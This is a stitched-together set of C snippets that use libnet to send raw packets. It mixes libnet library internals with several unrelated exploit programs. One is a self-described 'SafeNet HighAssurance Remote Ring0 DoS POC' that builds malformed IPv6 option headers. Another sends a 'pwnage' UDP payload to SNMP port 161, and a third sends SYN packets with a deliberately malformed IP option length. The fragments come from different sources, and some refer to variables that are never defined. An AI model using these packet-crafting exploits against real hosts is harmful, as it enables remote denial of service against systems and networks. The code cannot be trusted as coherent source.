int libnet_adv_write_raw_ipv4(libnet_t *l, const uint8_t *packet, uint32_t packet_s) { int c; if (l->injection_type != LIBNET_RAW4_ADV) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): advanced raw4 mode not enabled\n", __func__); return (-1); } c = libnet_write_raw_ipv4(l, packet, packet_s); /* do statistics */ if (c == packet_s) { l->stats.packets_sent++; l->stats.bytes_written += c; } else { l->stats.packet_errors++; /* * XXX - we probably should have a way to retrieve the number of * bytes actually written (since we might have written something). */ if (c > 0) { l->stats.bytes_written += c; } } return (c); }
static void send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H); ip->ip_id = libnet_get_prand(LIBNET_PRu16); memcpy(buf, (u_char *)ip, LIBNET_IPV4_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H); libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H); len = LIBNET_IPV4_H + LIBNET_TCP_H; if (libnet_write_raw_ipv4(l, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); }
int main (int argc, char **argv) { u_char *buf = NULL; /* libnet vars */ char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *lnsock; char *device = NULL; /* packet vars */ struct ip *ip_hdr = NULL; struct opt *opt_hdr = NULL; u_int32_t src_ip = 0, dst_ip = 0; printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POC\n" "by John Anderson <*****@*****.**>\n" " mu-b <*****@*****.**>\n\n"); if (!argv[1]) { printf ("Usage: %s <destination> [source]\n", argv[0]); exit (EXIT_FAILURE); } /* allocate space for packet */ if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL) { perror ("malloc: "); exit (EXIT_FAILURE); } /* initialise libnet */ lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf); if (lnsock == NULL) { fprintf (stderr, "libnet_init() failed: %s", errbuf); exit (-1); } if (!argv[2]) src_ip = lookup ("127.0.0.1"); else src_ip = lookup (argv[2]); dst_ip = lookup (argv[1]); /* Build the pseudo-IPv4 header */ memset (buf, 0, sizeof buf); ip_hdr = (struct ip *) buf; ip_hdr->ip_v = 6; ip_hdr->ip_hl = 0; ip_hdr->ip_tos = 0; ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN); ip_hdr->ip_id = htons (0); ip_hdr->ip_off = htons (0); ip_hdr->ip_ttl = 0; ip_hdr->ip_p = 0; ip_hdr->ip_sum = 0; ip_hdr->ip_src.s_addr = src_ip; ip_hdr->ip_dst.s_addr = dst_ip; /* Build option header with poison bytes */ opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN); opt_hdr->nxt_hdr = 0x3C; /* != 0x3B */ opt_hdr->opt_len = 0x07; /* length n such that:- *(((u_char *)opt_hdr) + n * 2) != 0x3B && *(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 && n * 2 < IPV6_HDR_LEN + UDP_LEN */ /* a value of 0x00 will suffice!@$%! */ printf ("Attacking %s", argv[1]); libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN); printf (".\n"); return (EXIT_SUCCESS); }
int libnet_write(libnet_t *l) { int c; uint32_t len; uint8_t *packet = NULL; if (l == NULL) { return (-1); } c = libnet_pblock_coalesce(l, &packet, &len); if (c == - 1) { /* err msg set in libnet_pblock_coalesce() */ return (-1); } /* assume error */ c = -1; switch (l->injection_type) { case LIBNET_RAW4: case LIBNET_RAW4_ADV: if (len > LIBNET_MAX_PACKET) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): packet is too large (%d bytes)\n", __func__, len); goto done; } c = libnet_write_raw_ipv4(l, packet, len); break; case LIBNET_RAW6: case LIBNET_RAW6_ADV: c = libnet_write_raw_ipv6(l, packet, len); break; case LIBNET_LINK: case LIBNET_LINK_ADV: c = libnet_write_link(l, packet, len); break; default: snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): unsuported injection type\n", __func__); goto done; } /* do statistics */ if (c == len) { l->stats.packets_sent++; l->stats.bytes_written += c; } else { l->stats.packet_errors++; /* * XXX - we probably should have a way to retrieve the number of * bytes actually written (since we might have written something). */ if (c > 0) { l->stats.bytes_written += c; } } done: /* * Restore original pointer address so free won't complain about a * modified chunk pointer. */ if (l->aligner > 0) { packet = packet - l->aligner; } free(packet); return (c); }
int libnet_write_raw_ipv6(libnet_t *l, const uint8_t *packet, uint32_t size) { /* no difference in win32 */ return (libnet_write_raw_ipv4(l, packet, size)); }
int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct udphdr *UDP; u_int32_t src = 0, dst = 0; banner(); if (argc < 3) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) { fprintf(stderr, "[!] libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved source address.\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved destination address.\n"); exit(-1); } if ((buf = malloc(IP_MAXPACKET)) == NULL) { perror("malloc"); exit(-1); } UDP = (struct udphdr *)(buf + LIBNET_IPV4_H); packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1; srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5; /* header length */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_UDP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; UDP->uh_sport = rand(); UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161); UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1); UDP->uh_sum = 0; memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1); libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("[+] Packet sent.\n"); libnet_destroy(l); free(buf); return (0); }
int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; char *device = NULL; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct tcphdr *TCP; u_int32_t src = 0, dst = 0; banner(); if (argc < 4) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, device, errbuf)) == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved source address\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Unresolved destination address\n"); exit(-1); } if ( (buf = malloc(IP_MAXPACKET)) == NULL ) { perror("malloc"); exit(-1); } buf[20] = atoi(argv[3]); buf[21] = 39; // our malformed size for (c = 0; c<38; c+=3) strncpy(&buf[22+c], "ECL", 3); // padding TCP = (struct tcphdr *)(buf + IP_H + IPOPTS_MAX); TCP->th_off = 5; packet_len = IP_H + IPOPTS_MAX + (TCP->th_off << 2); srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5 + (IPOPTS_MAX / 4);/* 60 byte header */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_TCP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; TCP->th_sport = htons(1337); TCP->th_dport = htons(80); TCP->th_seq = 0; TCP->th_ack = 0; TCP->th_x2 = 0; TCP->th_flags = TH_SYN; TCP->th_win = rand() & 0xffff; TCP->th_sum = 0; TCP->th_urp = 0; libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_TCP, TCP->th_off << 2); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("Packet sent.\n"); libnet_destroy(l); free(buf); return (0); }